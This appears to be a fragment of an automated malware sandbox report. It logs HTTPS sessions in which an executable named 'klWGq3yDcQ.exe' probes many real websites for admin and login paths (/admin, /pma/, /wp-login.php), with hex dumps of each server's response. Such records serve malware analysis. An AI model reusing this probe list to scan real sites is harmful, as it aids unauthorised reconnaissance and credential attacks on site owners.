                                                                                                                                                                                                    2023-11-26 05:59:42 UTC813INData Raw: 32 32 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 2277<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC8018INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    346192.168.2.46423713.32.208.274436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC172OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: www.perrisesd.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1145INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a 53 65 72 76 65 72 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 49 49 53 2f 31 30 2e 30 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 35 33 36 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Content-Length: 3067Connection: closeDate: Sun, 26 Nov 2023 05:59:42 GMTCache-Control: privateServer: Microsoft-IIS/10.0Strict-Transport-Security: max-age=31536000; includeSubDomain
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC3067INData Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 53 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 65 72 72 69 73 65 73 64 2e 6f 72 67 2f 53 74 61 74 69 63 2f 2f 73 69 74 65 2f 61 73 73 65 74 73 2f 53 74 79 6c 65 73 2f 73 79 73 74 65 6d 5f 32 37 34 31 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: <html><head> <link rel="Stylesheet" type="text/css" href="https://www.perrisesd.org/Static//site/assets/Styles/system_2741.css" /> <title>Error 404 - Page Not Found</title> <style type="text/css"> @font-face { font


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    347192.168.2.46423423.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC169OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC624INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 76 69 65 6e 74 2e 63 6f 6d 2f 61 64 6d 69 6e 2e 70 68 70 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 31 36 32 32 34 30 30 0d 0a 58 2d 50 61 6e 74 68 65 6f 6e 2d 53 74 79 78 2d 48 6f 73 74 6e 61 6d 65 3a 20 73 74 79 78 2d 66 65 31 2d 61 2d 37 63 39 63
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyConnection: closeContent-Length: 0Content-Type: text/html; charset=UTF-8Location: https://www.avient.com/admin.phpServer: nginxStrict-Transport-Security: max-age=31622400X-Pantheon-Styx-Hostname: styx-fe1-a-7c9c


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    348192.168.2.464372104.200.30.314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC170OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: edgewater.group
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC164INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:42 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC196INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    349192.168.2.46430472.167.58.1614436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC165OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                    Host: webstamp.ca
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC275INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e 73 65 63 75 72 65 2d 72 65 71 75 65 73 74 73 3b 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:42 GMTServer: ApacheContent-Security-Policy: upgrade-insecure-requests;Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-EncodingTransfer-Encoding: chunkedContent
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC641INData Raw: 32 37 35 0d 0a 2f 70 6d 61 2f 4f 4f 50 53 21 20 53 6f 6d 65 74 68 69 6e 67 20 77 65 6e 74 20 77 72 6f 6e 67 2e 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 68 61 73 20 62 65 65 6e 20 0d 0a 72 65 6d 6f 76 65 64 20 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 64 65 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 2e 0d 0a 46 65 65 6c 20 66 72 65 65 20 74 6f 20 72 65 61 64 20 74 68 65 20 6d 61 6e 79 20 6f 74 68 65 72 20 61 72 74 69 63 6c 65 73 20 61 76 61 69 6c 61 62 6c 65 20 61 74 20 0d 0a 68 74 74 70 73 3a 2f 2f 77 65 62 73 74 61 6d 70 2e 63 61 0d 0a 3c 21 2d 2d 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: 275/pma/OOPS! Something went wrong. The page you requested has been removed or is currently under maintenance.Feel free to read the many other articles available at https://webstamp.ca...


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    350192.168.2.46432934.149.87.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC171OUTGET /en/admin HTTP/1.1
                                                                                                                                                                                                    Host: www.dstaq.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1078INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 38 36 35 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 33 36 30 30 0d 0a 58 2d 57 69 78 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 31 37 30 30 39 37 38 33 38 32 2e 35 34 36 31 30 33 32 38 37 30 38 39 39 32 35 31 35 30 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 53 65 72 76 65 72 3a 20 50 65 70 79 61 6b 61 2f 31 2e 31 39 2e 31 30 0d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Length: 2865Content-Type: text/html; charset=UTF-8Content-Language: enStrict-Transport-Security: max-age=3600X-Wix-Request-Id: 1700978382.546103287089925150Age: 0Cache-Control: no-cacheServer: Pepyaka/1.19.10
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC174INData Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73
                                                                                                                                                                                                    Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-s
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1252INData Raw: 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72
                                                                                                                                                                                                    Data Ascii: calable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="r
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1252INData Raw: 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 77 69 78 2d 70 75 62 6c 69 63 2f 31 2e 37 31 39 2e 30 2f 73 63 72 69 70 74 73 2f 65 72
                                                                                                                                                                                                    Data Ascii: arty/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/er
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC187INData Raw: 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f 77 73 65 72 2e 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 21 2d 2d 20 65 6e 64 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: gardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    351192.168.2.464220104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC177OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC774INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC595INData Raw: 31 38 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 72 63 68 69 76 65
                                                                                                                                                                                                    Data Ascii: 18e9<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; High Tide Inc. &#8212; WordPress</title><meta name="robots" content="max-image-preview:large, noindex, noarchive
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 6c 31 30 6e 2d 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d
                                                                                                                                                                                                    Data Ascii: "https://hightideinc.com/wp-admin/css/forms.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id="l10n-css" href="https://hightideinc.com/wp-admin/css/l10n.min.css?ver=6.4.1" type="text/css" media="all" /><link rel="stylesheet" id=
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 22 20 69 64 3d 22 75 73 65 72 5f 6c 6f 67 69 6e 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 22 20 76 61 6c 75 65 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 20 2f 3e 0a 3c 2f 70 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 75 73 65 72 2d 70 61 73 73 2d 77 72 61 70 22 3e 0a 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 5f 70 61 73 73 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 70 2d 70 77 64 22 3e 0a
                                                                                                                                                                                                    Data Ascii: Address</label><input type="text" name="log" id="user_login" class="input" value size="20" autocapitalize="off" autocomplete="username" required="required" /></p><div class="user-pass-wrap"><label for="user_pass">Password</label><div class="wp-pwd">
